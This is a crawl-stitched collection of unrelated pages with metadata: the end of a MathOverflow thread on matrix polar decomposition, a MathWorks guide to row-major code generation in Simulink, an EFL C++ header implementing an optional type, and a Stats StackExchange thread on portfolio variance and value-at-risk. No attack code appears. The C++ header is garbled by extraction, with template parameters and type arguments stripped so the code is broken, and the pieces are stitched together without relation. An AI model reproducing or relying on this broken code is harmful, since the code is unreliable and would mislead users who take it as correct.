e^{i \\text{Im}(w)} =$\". In that case, $e^{\\text{Re}(w)} = |z|$ and $\\text{Im}(w) = \\text{arg}(z) \\text{ mod } 2 \\pi$ – Dean Young Oct 13 '18 at 14:21" ]
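A quick numerical illustration of the formulas in the answer, $P=(A^\ast A)^{1/2}$ and $U=AP^{+}$ (my own sketch, not part of the thread; for invertible $A$ the pseudo-inverse of $P$ is simply its inverse):

```python
import numpy as np

rng = np.random.default_rng(0)
A = rng.normal(size=(3, 3)) + 1j * rng.normal(size=(3, 3))  # generic invertible A

# P = (A* A)^(1/2) via the eigendecomposition of the Hermitian matrix A* A.
w, V = np.linalg.eigh(A.conj().T @ A)
P = V @ np.diag(np.sqrt(w)) @ V.conj().T      # Hermitian positive definite
U = A @ np.linalg.inv(P)                      # unitary when A is invertible

print(np.allclose(A, U @ P))                      # True: A = U P
print(np.allclose(U.conj().T @ U, np.eye(3)))     # True: U is unitary
print(np.all(np.linalg.eigvalsh(P) > 0))          # True: P is positive definite
```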
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7457492,"math_prob":0.9998425,"size":3036,"snap":"2019-26-2019-30","text_gpt3_token_len":901,"char_repetition_ratio":0.17051451,"word_repetition_ratio":0.0,"special_character_ratio":0.28096178,"punctuation_ratio":0.061818182,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.000002,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-06-20T18:04:46Z\",\"WARC-Record-ID\":\"<urn:uuid:011a5cfa-e6ba-433f-9ad0-abfc3199c0a8>\",\"Content-Length\":\"137060\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:98c39b13-da90-445f-a33a-e06e8dbe2539>\",\"WARC-Concurrent-To\":\"<urn:uuid:377c5f5b-c055-4a2e-ba2d-cfe05d287ace>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://mathoverflow.net/questions/312704/generalizing-polar-decomposition-of-matrices\",\"WARC-Payload-Digest\":\"sha1:EKUI4PWGWXK4NMRRLQHLXNHQWIMH3H2M\",\"WARC-Block-Digest\":\"sha1:FRBZ7S37XZHPCLIJTJD5OLZ7Q3IQL3ZX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-26/CC-MAIN-2019-26_segments_1560627999263.6_warc_CC-MAIN-20190620165805-20190620191805-00185.warc.gz\"}"}
https://la.mathworks.com/help/rtw/ug/generate-row-major-code-with-matlab-function-block.html
[ "## Generate Row-Major Code for Model That Contains a MATLAB Function Block\n\nProgramming languages and environments assume a single array layout for all data. MATLAB® and Fortran use column-major layout by default, whereas C and C++ use row-major layout. With Simulink® Coder™, you can generate C/C++ code that uses row-major layout or column-major layout.\n\nMATLAB Function blocks enable you to define custom functionality in Simulink models by using the MATLAB language. You can generate row-major code for models that contain a MATLAB Function block by using row-major or column-major data. For more information on MATLAB Function blocks, see Implement MATLAB Functions in Simulink with MATLAB Function Blocks.\n\nBy default, the code generator generates column-major code. For C/C++ code generation, you can specify the array layout at the model level by using the Array layout model configuration parameter. Setting this parameter to `Row-major` enables the model for row-major code generation. To enable the MATLAB Function block in your model for row-major code generation, use the `coder.rowMajor` function at the function level inside the block.\n\n### Row-Major Code Generation\n\nFor certain algorithms, row-major layout provides more efficient memory access. You get efficient code when you generate code for a model that uses row-major array layout and the model contains a MATLAB Function block that uses an algorithm for row-major data.\n\n1. Consider an example model `ex_row_major_MLFB`.", null, "This model contains a Constant block that has a `[5 4]` matrix. To specify the matrix, set Constant value to:\n\n`reshape(1:20,5,4)`\nThe Inport block also specifies a `[5 4]` matrix. To specify the matrix, set the Port dimensions to `[5 4]`.\n\n2. In the Configuration Parameters dialog box, set Array layout to `Row-major`.\n\n3. Write a function for matrix addition called `addMatrix`. The MATLAB Function block inherits the array layout setting from the model configuration parameter Array layout unless specified otherwise.\n\nOptionally, you can use `coder.rowMajor` to explicitly set the array layout of the MATLAB Function block to row-major layout.\n\n```function S = addMatrix(A,B) S = zeros(size(A)); for row = 1:size(A,1) for col = 1:size(A,2) S(row,col) = A(row,col) + B(row,col); end end```\n\n4. Generate code for the model. From the C Code tab, click Build.\n\nThe code generator produces this C code:\n\n```for (b_row = 0; b_row < 5; b_row++) { for (b_col = 0; b_col < 4; b_col++) { rtb_S_tmp = (b_row << 2) + b_col; rtb_S[rtb_S_tmp] = ex_row_major_MLFB_P.Constant_Value[rtb_S_tmp] + ex_row_major_MLFB_U.Inport1[rtb_S_tmp]; } }```\nThe generated code has two `for` loops. The first `for` loop accesses the rows and the second `for` loop accesses the columns. When the array layout of the MATLAB Function block and the model is the same, the generated code is efficient because no transposes or conversion are required.\n\n### Mixed-Majority Code Generation\n\nYou can generate mixed-majority code when you have a model that operates on row-major data and a MATLAB Function block that operates on column-major data. When you generate code for a model that uses column-major layout, and the model contains a MATLAB Function block that uses row-major layout, then the code generator converts the block input data to row-major and the block output data back to column-major data, as needed. 
You can also generate mixed-majority code when you have a model that operates on column-major data and a MATLAB Function block that operates on row-major data.\n\nArray layout conversions can affect performance.\n\n1. Consider the example model `ex_row_major_MLFB`. For more information on the example model, see Row-Major Code Generation.\n\nIn the Configuration Parameters dialog box, set Array layout to `Row-major`.\n\n2. Update the `addMatrix` function in the MATLAB Function block for column-major data by using the `coder.columnMajor` function.\n\n```function S = addMatrix(A,B) coder.columnMajor; S = zeros(size(A)); for row = 1:size(A,1) for col = 1:size(A,2) S(row,col) = A(row,col) + B(row,col); end end```\nYou can generate mixed-majority code by using the MATLAB Function block. In this case, you configure the model for row-major array layout and the MATLAB Function block for column-major array layout.\n\n3. Generate code for the model. From the C Code tab, click Build.\n\nThe code generator produces this C code:\n\n```for (b_row = 0; b_row < 4; b_row++) { for (b_col = 0; b_col < 5; b_col++) { B_tmp = (b_col << 2) + b_row; B_tmp_0 = b_col + 5 * b_row; B[B_tmp_0] = ex_row_major_MLFB_19b_U.Inport1[B_tmp]; A[B_tmp_0] = ex_row_major_MLFB_19b_P.Constant_Value[B_tmp]; } } for (b_row = 0; b_row < 5; b_row++) { /* Outport: '<Root>/Outport' */ for (b_col = 0; b_col < 4; b_col++) { B_tmp = 5 * b_col + b_row; ex_row_major_MLFB_19b_Y.Outport[b_col + (b_row << 2)] = A[B_tmp] + B[B_tmp]; } }```\nThe inputs to the MATLAB Function block exist in a row-major environment. The code generator performs a conversion operation on inputs before they are fed to the MATLAB Function block because the block uses column-major layout. After processing the algorithm in the MATLAB Function block, the code generator converts the data back to row-major data before passing the data to an Outport." ]
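The index arithmetic in the generated C code above (`(b_row << 2) + b_col` for row-major access to a matrix with 4 columns, `5 * b_col + b_row` for column-major access to one with 5 rows) can be mimicked outside Simulink. The following NumPy sketch is my own illustration and is not part of the MathWorks documentation:

```python
import numpy as np

# reshape(1:20,5,4) in MATLAB fills column-major, i.e. order='F' in NumPy.
A = np.reshape(np.arange(1, 21), (5, 4), order='F')

row_major = A.flatten(order='C')   # memory layout when Array layout = Row-major
col_major = A.flatten(order='F')   # MATLAB's / Simulink's default column-major

# Element (row, col) of the 5-by-4 matrix sits at different linear offsets:
row, col = 2, 3
print(row_major[row * 4 + col] == A[row, col])   # True: row-major indexing
print(col_major[col * 5 + row] == A[row, col])   # True: column-major indexing
```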
[ null, "https://la.mathworks.com/help/rtw/ug/ex_row_major_mlfb.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.62000734,"math_prob":0.9269945,"size":4808,"snap":"2022-27-2022-33","text_gpt3_token_len":1187,"char_repetition_ratio":0.18547045,"word_repetition_ratio":0.24021593,"special_character_ratio":0.24750416,"punctuation_ratio":0.1286031,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9964357,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-29T06:28:40Z\",\"WARC-Record-ID\":\"<urn:uuid:6ebea970-5786-46a7-8e7e-0397c81871d9>\",\"Content-Length\":\"78523\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:151d188a-6e64-45e6-a2f7-06db6f0dbe00>\",\"WARC-Concurrent-To\":\"<urn:uuid:72f1ed3d-8828-4939-92c0-d7d590104cc6>\",\"WARC-IP-Address\":\"23.46.246.122\",\"WARC-Target-URI\":\"https://la.mathworks.com/help/rtw/ug/generate-row-major-code-with-matlab-function-block.html\",\"WARC-Payload-Digest\":\"sha1:VVRGGMYXEOHCVLV42AHTCQ5RZONUKNHT\",\"WARC-Block-Digest\":\"sha1:4YY5UEAERN3WCLC4CBDBZ7NH5D4Q4KNU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103624904.34_warc_CC-MAIN-20220629054527-20220629084527-00231.warc.gz\"}"}
https://git.enlightenment.org/kimcinoo/efl/src/commit/c4124f8b3658a4f7dd8621d6b0bd86d758d445d8/src/bindings/cxx/eina_cxx/eina_optional.hh
[ "forked from enlightenment/efl\nYou can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.\n\n#### 695 lines 20 KiB Raw Blame History\n\n `#ifndef EINA_OPTIONAL_HH_` `#define EINA_OPTIONAL_HH_` `#include ` `#include ` `#include ` `#include ` `/**` ` * @addtogroup Eina_Cxx_Data_Types_Group` ` *` ` * @{` ` */` ``` ``` `namespace efl_eina_swap_adl {` ``` ``` `/**` ` * @internal` ` */` `template ` `void swap_impl(T& lhs, T& rhs)` `{` ` using namespace std;` ` swap(lhs, rhs);` `}` ``` ``` `}` ``` ``` `namespace efl { namespace eina {` ``` ``` `/**` ` * @defgroup Eina_Cxx_Optional_Group Optional Value` ` * @ingroup Eina_Cxx_Data_Types_Group` ` *` ` * @{` ` */` ``` ``` `/**` ` * @internal` ` */` `template ` `void adl_swap(T& lhs, T& rhs)` `{` ` ::efl_eina_swap_adl::swap_impl(lhs, rhs);` `}` ``` ``` `/**` ` * This class manages an optional contained value, i.e. a value that` ` * semantically may not be present.` ` *` ` * A common use case for optional is the return value of a function that` ` * may fail. As opposed to other approaches, such as` ` * std::pair, optional handles expensive to construct` ` * objects well and is more readable, as the intent is expressed` ` * explicitly.` ` *` ` * An optional object holding a semantically present value is considered` ` * to be @em engaged, otherwise it is considered to be @em disengaged.` ` */` `template ` `struct optional` `{` ` typedef optional _self_type; /**< Type for the optional class itself. */` ``` ``` ` /**` ` * @brief Create a disengaged object.` ` *` ` * This constructor creates a disengaged eina::optional` ` * object.` ` */` ` constexpr optional(std::nullptr_t) : engaged(false)` ` {}` ``` ``` ` /**` ` * @brief Default constructor. Create a disengaged object.` ` */` ` constexpr optional() : engaged(false)` ` {}` ``` ``` ` /**` ` * @brief Create an engaged object by moving @p other content.` ` * @param other R-value reference to the desired type.` ` *` ` * This constructor creates an eina::optional object in an` ` * engaged state. The contained value is initialized by moving` ` * @p other.` ` */` ` optional(T&& other) : engaged(false)` ` {` ` _construct(std::forward(other));` ` }` ``` ``` ` /**` ` * @brief Create an engaged object by copying @p other content.` ` * @param other Constant reference to the desired type.` ` *` ` * This constructor creates an eina::optional object in an` ` * engaged state. The contained value is initialized by copying` ` * @p other.` ` */` ` optional(T const& other) : engaged(false)` ` {` ` _construct(other);` ` }` ``` ``` ` /**` ` * @brief Create an engaged object by moving @p other content.` ` * @param other R-value reference to the desired type.` ` *` ` * This constructor creates an eina::optional object in an` ` * engaged state. The contained value is initialized by moving` ` * @p other.` ` */` ` template ` ` optional(U&& other, typename std::enable_if::value>::type* = 0) : engaged(false)` ` {` ` _construct(std::forward(other));` ` }` ``` ``` ` /**` ` * @brief Create an engaged object by copying @p other content.` ` * @param other Constant reference to the desired type.` ` *` ` * This constructor creates an eina::optional object in an` ` * engaged state. The contained value is initialized by copying` ` * @p other.` ` */` ` template ` ` optional(U const& other, typename std::enable_if::value>::type* = 0) : engaged(false)` ` {` ` _construct(other);` ` }` ``` ``` ` /**` ` * @brief Copy constructor. 
Create an object containing the same value as @p other and in the same state.` ` * @param other Constant reference to another eina::optional object that holds the same value type.` ` *` ` * This constructor creates an eina::optional object with` ` * the same engagement state of @p other. If @p other is engaged then` ` * the contained value of the newly created object is initialized by` ` * copying the contained value of @p other.` ` */` ` optional(optional const& other)` ` : engaged(false)` ` {` ` if(other.engaged) _construct(*other);` ` }` ``` ``` ` /**` ` * @brief Move constructor. Create an object containing the same value as @p other and in the same state.` ` * @param other R-value reference to another eina::optional object that holds the same value type.` ` *` ` * This constructor creates an eina::optional object with` ` * the same engagement state of @p other. If @p other is engaged then` ` * the contained value of the newly created object is initialized by` ` * moving the contained value of @p other.` ` */` ` optional(optional&& other)` ` : engaged(false)` ` {` ` if(other.engaged) _construct(std::move(*other));` ` other._destroy();` ` }` ``` ``` ` /**` ` * @brief Move constructor. Create an object containing the same value as @p other and in the same state.` ` * @param other R-value reference to another eina::optional object that holds a different, but convertible, value type.` ` *` ` * This constructor creates an eina::optional object with` ` * the same engagement state of @p other. If @p other is engaged then` ` * the contained value of the newly created object is initialized by` ` * moving the contained value of @p other.` ` */` ` template ` ` optional(optional&& other, typename std::enable_if::value>::type* = 0)` ` : engaged(false)` ` {` ` if (other.is_engaged()) _construct(std::move(*other));` ` other.disengage();` ` }` ``` ``` ` /**` ` * @brief Copy constructor. Create an object containing the same value as @p other and in the same state.` ` * @param other Constant reference to another eina::optional object that holds a different, but convertible, value type.` ` *` ` * This constructor creates an eina::optional object with` ` * the same engagement state of @p other. If @p other is engaged then` ` * the contained value of the newly created object is initialized by` ` * converting and copying the contained value of @p other.` ` */` ` template ` ` optional(optional const& other, typename std::enable_if::value>::type* = 0)` ` : engaged(false)` ` {` ` if (other.is_engaged()) _construct(*other);` ` }` ``` ``` ` /**` ` * @brief Assign new content to the object.` ` * @param other R-value reference to another eina::optional object that holds the same value type.` ` *` ` * This operator replaces the current content of the object. If` ` * @p other is engaged its contained value is moved to this object,` ` * making *this be considered engaged too. If @p other is` ` * disengaged *this is also made disengaged and its` ` * contained value, if any, is simple destroyed.` ` */` ` _self_type& operator=(optional&& other)` ` {` ` _destroy();` ` if (other.engaged)` ` _construct(std::move(*other));` ` other._destroy();` ` return *this;` ` }` ``` ``` ` /**` ` * @brief Assign new content to the object.` ` * @param other Constant reference to another eina::optional object that holds the same value type.` ` *` ` * This operator replaces the current content of the object. If` ` * @p other is engaged its contained value is copied to this object,` ` * making *this be considered engaged too. 
If @p other is` ` * disengaged *this is also made disengaged and its` ` * contained value, if any, is simple destroyed.` ` */` ` _self_type& operator=(optionalconst& other)` ` {` ` optional tmp(other);` ` tmp.swap(*this);` ` return *this;` ` }` ``` ``` ` /**` ` * @brief Assign new content to the object.` ` * @param other R-value reference to another eina::optional object that holds a different, but convertible, value type.` ` *` ` * This operator replaces the current content of the object. If` ` * @p other is engaged its contained value is moved to this object,` ` * making *this be considered engaged too. If @p other is` ` * disengaged *this is also made disengaged and its` ` * contained value, if any, is simple destroyed.` ` */` ` template ` ` typename std::enable_if::value, _self_type>::type& operator=(optional&& other)` ` {` ` _destroy();` ` if (other.is_engaged())` ` _construct(std::move(*other));` ` other.disengage();` ` return *this;` ` }` ``` ``` ` /**` ` * @brief Assign new content to the object.` ` * @param other Constant reference to another eina::optional object that holds a different, but convertible, value type.` ` *` ` * This operator replaces the current content of the object. If` ` * @p other is engaged its contained value is converted and copied to this` ` * object, making *this be considered engaged too. If @p other is` ` * disengaged *this is also made disengaged and its` ` * contained value, if any, is simple destroyed.` ` */` ` template ` ` typename std::enable_if::value, _self_type>::type& operator=(optionalconst& other)` ` {` ` _destroy();` ` if (other.is_engaged())` ` _construct(*other);` ` return *this;` ` }` ``` ``` ` /**` ` * @brief Disengage the object, destroying the current contained value, if any.` ` */` ` void disengage()` ` {` ` _destroy();` ` }` ``` ``` ` /**` ` * @brief Releases the contained value if the object is engaged.` ` */` ` ~optional()` ` {` ` _destroy();` ` }` ``` ``` ` /**` ` * @brief Convert to @c bool based on whether the object is engaged or not.` ` * @return @c true if the object is engaged, @c false otherwise.` ` */` ` explicit operator bool() const` ` {` ` return is_engaged();` ` }` ``` ``` ` /**` ` * @brief Convert to @c bool based on whether the object is engaged or not.` ` * @return @c true if the object is disengaged, @c false otherwise.` ` */` ` bool operator!() const` ` {` ` bool b ( *this );` ` return !b;` ` }` ``` ``` ` /**` ` * @brief Access member of the contained value.` ` * @return Pointer to the contained value, whose member will be accessed.` ` */` ` T* operator->()` ` {` ` assert(is_engaged());` ` return static_cast(static_cast(&buffer));` ` }` ``` ``` ` /**` ` * @brief Access constant member of the contained value.` ` * @return Constant pointer to the contained value, whose member will be accessed.` ` */` ` T const* operator->() const` ` {` ` return const_cast<_self_type&>(*this).operator->();` ` }` ``` ``` ` /**` ` * @brief Get the contained value.` ` * @return Reference to the contained value.` ` */` ` T& operator*() { return get(); }` ``` ``` ` /**` ` * @brief Get the contained value.` ` * @return Constant reference to the contained value.` ` */` ` T const& operator*() const { return get(); }` ``` ``` ` /**` ` * @brief Get the contained value.` ` * @return Reference to the contained value.` ` */` ` T& get() { return *this->operator->(); }` ``` ``` ` /**` ` * @brief Get the contained value.` ` * @return Constant reference to the contained value.` ` */` ` T const& get() const { return *this->operator->(); }` ``` ``` ` 
/**` ` * @brief Swap content with another eina::optional object.` ` * @param other Another eina::optional object.` ` */` ` void swap(optional& other)` ` {` ` if(is_engaged() && other.is_engaged())` ` {` ` eina::adl_swap(**this, *other);` ` }` ` else if(is_engaged())` ` {` ` other._construct(std::move(**this));` ` _destroy();` ` }` ` else if(other.is_engaged())` ` {` ` _construct(std::move(*other));` ` other._destroy();` ` }` ` }` ``` ``` ` /**` ` * @brief Check if the object is engaged.` ` * @return @c true if the object is currently engaged, @c false otherwise.` ` */` ` bool is_engaged() const` ` {` ` return engaged;` ` }` `private:` ``` ``` ` /**` ` * @internal` ` */` ` template ` ` void _construct(U&& object)` ` {` ` assert(!is_engaged());` ` new (&buffer) T(std::forward(object));` ` engaged = true;` ` }` ``` ``` ` /**` ` * @internal` ` */` ` void _destroy()` ` {` ` if(is_engaged())` ` {` ` static_cast(static_cast(&buffer))->~T();` ` engaged = false;` ` }` ` }` ``` ``` ` typedef typename std::aligned_storage` ` ::value>::type buffer_type;` ``` ``` ` /**` ` * Member variable for holding the contained value.` ` */` ` buffer_type buffer;` ``` ``` ` /**` ` * Flag to tell whether the object is engaged or not.` ` */` ` bool engaged;` `};` ``` ``` `template ` `struct optional` `{` ` typedef optional _self_type; /**< Type for the optional class itself. */` ``` ``` ` /**` ` * @brief Create a disengaged object.` ` *` ` * This constructor creates a disengaged eina::optional` ` * object.` ` */` ` constexpr optional(std::nullptr_t) : pointer(nullptr)` ` {}` ``` ``` ` /**` ` * @brief Default constructor. Create a disengaged object.` ` */` ` constexpr optional() : pointer(nullptr)` ` {}` ``` ``` ` /**` ` * @brief Create an engaged object by moving @p other content.` ` * @param other R-value reference to the desired type.` ` *` ` * This constructor creates an eina::optional object in an` ` * engaged state. The contained value is initialized by moving` ` * @p other.` ` */` ` optional(T& other) : pointer(&other)` ` {` ` }` ``` ``` ` /**` ` * @brief Copy constructor. Create an object containing the same value as @p other and in the same state.` ` * @param other Constant reference to another eina::optional object that holds the same value type.` ` *` ` * This constructor creates an eina::optional object with` ` * the same engagement state of @p other. If @p other is engaged then` ` * the contained value of the newly created object is initialized by` ` * copying the contained value of @p other.` ` */` ` optional(_self_type const& other) = default;` ``` ``` ` /**` ` * @brief Assign new content to the object.` ` * @param other Constant reference to another eina::optional object that holds the same value type.` ` *` ` * This operator replaces the current content of the object. If` ` * @p other is engaged its contained value is copied to this object,` ` * making *this be considered engaged too. 
If @p other is` ` * disengaged *this is also made disengaged and its` ` * contained value, if any, is simple destroyed.` ` */` ` _self_type& operator=(_self_type const& other) = default;` ``` ``` ` /**` ` * @brief Disengage the object, destroying the current contained value, if any.` ` */` ` void disengage()` ` {` ` pointer = NULL;` ` }` ``` ``` ` /**` ` * @brief Convert to @c bool based on whether the object is engaged or not.` ` * @return @c true if the object is engaged, @c false otherwise.` ` */` ` explicit operator bool() const` ` {` ` return pointer;` ` }` ``` ``` ` /**` ` * @brief Convert to @c bool based on whether the object is engaged or not.` ` * @return @c true if the object is disengaged, @c false otherwise.` ` */` ` bool operator!() const` ` {` ` bool b ( *this );` ` return !b;` ` }` ``` ``` ` /**` ` * @brief Access member of the contained value.` ` * @return Pointer to the contained value, whose member will be accessed.` ` */` ` T* operator->()` ` {` ` assert(is_engaged());` ` return pointer;` ` }` ``` ``` ` /**` ` * @brief Access constant member of the contained value.` ` * @return Constant pointer to the contained value, whose member will be accessed.` ` */` ` T const* operator->() const` ` {` ` return pointer;` ` }` ``` ``` ` /**` ` * @brief Get the contained value.` ` * @return Reference to the contained value.` ` */` ` T& operator*() { return get(); }` ``` ``` ` /**` ` * @brief Get the contained value.` ` * @return Constant reference to the contained value.` ` */` ` T const& operator*() const { return get(); }` ``` ``` ` /**` ` * @brief Get the contained value.` ` * @return Reference to the contained value.` ` */` ` T& get() { return *this->operator->(); }` ``` ``` ` /**` ` * @brief Get the contained value.` ` * @return Constant reference to the contained value.` ` */` ` T const& get() const { return *this->operator->(); }` ``` ``` ` /**` ` * @brief Swap content with another eina::optional object.` ` * @param other Another eina::optional object.` ` */` ` void swap(optional& other)` ` {` ` std::swap(pointer, other.pointer);` ` }` ``` ``` ` /**` ` * @brief Check if the object is engaged.` ` * @return @c true if the object is currently engaged, @c false otherwise.` ` */` ` bool is_engaged() const` ` {` ` return pointer;` ` }` `private:` ``` ``` ` /**` ` * Member variable for holding the contained value.` ` */` ` T* pointer;` `};` ` ` `template ` `constexpr optional::type>` `make_optional(T&& value)` `{` ` return optional::type>(std::forward(value));` `}` ``` ``` `/**` ` * @brief Swap content with another eina::optional object.` ` *` ` */` `template ` `void swap(optional& lhs, optional& rhs)` `{` ` lhs.swap(rhs);` `}` ``` ``` `/**` ` * @brief Check if both eina::optional object are equal.` ` * @param lhs eina::optional object at the left side of the expression.` ` * @param rhs eina::optional object at the right side of the expression.` ` * @return @c true if both are objects are disengaged of if both objects` ` * are engaged and contain the same value, @c false in all` ` * other cases.` ` */` `template ` `bool operator==(optional const& lhs, optional const& rhs)` `{` ` if(!lhs && !rhs)` ` return true;` ` else if(!lhs || !rhs)` ` return false;` ` else` ` return *lhs == *rhs;` `}` ``` ``` `/**` ` * @brief Check if the eina::optional objects are different.` ` * @param lhs eina::optional object at the left side of the expression.` ` * @param rhs eina::optional object at the right side of the expression.` ` * @return The opposite of @ref operator==(optional const& lhs, optional 
const& rhs).` ` */` `template ` `bool operator!=(optional const& lhs, optional const& rhs)` `{` ` return !(lhs == rhs);` `}` ``` ``` `/**` ` * @brief Less than comparison between eina::optional objects.` ` * @param lhs eina::optional object at the left side of the expression.` ` * @param rhs eina::optional object at the right side of the expression.` ` * @return @c true if both objects are engaged and the contained value` ` * of @p lhs is less than the contained value of @p rhs, or if` ` * only @p lhs is disengaged. In all other cases returns` ` * @c false.` ` */` `template ` `bool operator<(optional const& lhs, optional const& rhs)` `{` ` if(!lhs && !rhs)` ` return false;` ` else if(!lhs)` ` return true;` ` else if(!rhs)` ` return false;` ` else` ` return *lhs < *rhs;` `}` ``` ``` `/**` ` * @brief Less than or equal comparison between eina::optional objects.` ` * @param lhs eina::optional object at the left side of the expression.` ` * @param rhs eina::optional object at the right side of the expression.` ` * @return @c true if @p lhs is disengaged or if both objects are` ` * engaged and the contained value of @p lhs is less than or` ` * equal to the contained value of @p rhs. In all other cases` ` * returns @c false.` ` */` `template ` `bool operator<=(optional const& lhs, optional const& rhs)` `{` ` return lhs < rhs || lhs == rhs;` `}` ``` ``` `/**` ` * @brief More than comparison between eina::optional objects.` ` * @param lhs eina::optional object at the left side of the expression.` ` * @param rhs eina::optional object at the right side of the expression.` ` * @return @c true if both objects are engaged and the contained value` ` * of @p lhs is more than the contained value of @p rhs, or if` ` * only @p rhs is disengaged. In all other cases returns` ` * @c false.` ` */` `template ` `bool operator>(optional const& lhs, optional const& rhs)` `{` ` return !(lhs <= rhs);` `}` ``` ``` `/**` ` * @brief More than or equal comparison between eina::optional objects.` ` * @param lhs eina::optional object at the left side of the expression.` ` * @param rhs eina::optional object at the right side of the expression.` ` * @return @c true if @p rhs is disengaged or if both objects are` ` * engaged and the contained value of @p lhs is more than or` ` * equal to the contained value of @p rhs. In all other` ` * cases returns @c false.` ` */` `template ` `bool operator>=(optional const& lhs, optional const& rhs)` `{` ` return !(lhs < rhs);` `}` ``` ``` `/**` ` * @}` ` */` ``` ``` `} } // efl::eina` `/**` ` * @}` ` */` ``` ``` ```#endif // EINA_OPTIONAL_HH_ ``` ``` ```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5153133,"math_prob":0.76735276,"size":19838,"snap":"2023-14-2023-23","text_gpt3_token_len":5372,"char_repetition_ratio":0.22471513,"word_repetition_ratio":0.77065,"special_character_ratio":0.3415163,"punctuation_ratio":0.17175107,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96269643,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-09T03:51:33Z\",\"WARC-Record-ID\":\"<urn:uuid:b9fec013-4cae-4ee5-9558-194da3eaae91>\",\"Content-Length\":\"357244\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2b658b69-0165-4c72-8671-e7dc5bdc5834>\",\"WARC-Concurrent-To\":\"<urn:uuid:b79c5a74-efc1-4c0e-954c-c2bba0ea458c>\",\"WARC-IP-Address\":\"140.211.167.131\",\"WARC-Target-URI\":\"https://git.enlightenment.org/kimcinoo/efl/src/commit/c4124f8b3658a4f7dd8621d6b0bd86d758d445d8/src/bindings/cxx/eina_cxx/eina_optional.hh\",\"WARC-Payload-Digest\":\"sha1:BQLMNRTXZTQHMTJZLRCTRF3MKZZO5EV5\",\"WARC-Block-Digest\":\"sha1:FFPBB7WVTLP3DEA6HRYJWGLXSFBY6EIZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224655247.75_warc_CC-MAIN-20230609032325-20230609062325-00787.warc.gz\"}"}
https://stats.stackexchange.com/questions/126675/variance-of-portfolio-future-values-based-on-return-distribution
[ "# Variance of portfolio future values based on return distribution\n\nI'm trying to estimate the distribution of future portfolio values based on the distribution of a portfolio's returns.\n\nFirst, to define some variables:\n\n• Rt = simple return for period t\n• rt = ln(1+Rt)\n• Vt = portfolio value at period t\n\nIf we assume rt is a normally distributed random value and an initial investment of $1, ln(Vt) = r1 + r2 + ... + rt. Since ln(Vt) is a sum of normally distributed random variables, ln(Vt) is also normal. Its mean is t * mean(rt), and its variance is t * var(rt). MY PROBLEM: I need to get the distribution of portfolio values based on a starting value that is not 1 dollar and cash inflows/outflows each period thereafter. I can get the mean by adding ln(starting_value). However, I am not sure how to modify the variance from the scenario above to adjust for the fact that my scale is no longer based on a starting value of$1. If I just take the cumulative sum of the variance of the returns like I did in the scenario above, the portfolio's variance each period is far too small.\n\nAny help would be greatly appreciated. I can provide a spreadsheet with a fairly simple example calculation if that helps clarify what I'm trying to do.\n\nRead RiskMetrics Technical Manual here. It describes value-at-risk (VaR) computation. That's what you're trying to do. Particularly, you're implementing so called \"historical VaR\" with a parametric distribution fit.\n\n• The essence of the method is described on page 8. Look at bullet #1: $V_1=V_0e^{r}$, where $V_1,V_0$ are future and current values of a portfolio, and $r$ is the return.\n• Look at bullet #4: when $r<<1$ you can apporoximate $V_1\\approx V_0+V_0r$.\n• Now, you can compute the variance of the future portfolio value: $Var[V_1]=V_0^2Var[r]$.\n• Where to get $r$ from? There are many different approaches. You seem to be trying the simplest one: assume that the variance is constant and estimate it from historical series.\n\nSo the rest is a technicality. Get the series of returns from the past: $r_t=\\ln(V_t/V_{t-1})$, and estimate its variance and other parameters. Note, as I wrote earlier: the log here is simply to compute the continuously compounded return. See Eq. 4.3 on page 46.\n\nThere's a lot of interesting stuff in the document. For instance, the returns in the distance past are probably less relevant to the tomorrow's return than the returns in the recent periods. So, they use EWMA to account for that.\n\n• Hmm. I'm a little lost because I don't think I'll have time to go through that VaR section of the document. I have some portfolio management notes that cover the topic as well, but I never took the course and just need to quickly figure out the calculation for Var(ln(Vtomorrow)). Any idea if that's in the document you referenced? – dvanderb Dec 4 '14 at 21:36\n• This is the doc which introduced VaR in the first place. So, yes, this stuff will be there, and it's written for applied folks, i.e. light on theory and easy to read. Also, you don't estimate $Var[\\ln(V_t)]$, but $Var[\\ln(r_t)]$ - returns, not log values. The diff of a log is a continuous return. – Aksakal Dec 4 '14 at 21:39\n• The problem for me is that I haven't done any portfolio management (I'm trying to figure this out for a web application and am learning as I go). I'm not sure why I would be able to estimate E[ln(Vt)] but not the variance. I guess I'll just need to keep reading and figure this out. Thanks for the help pointing me in the right direction. 
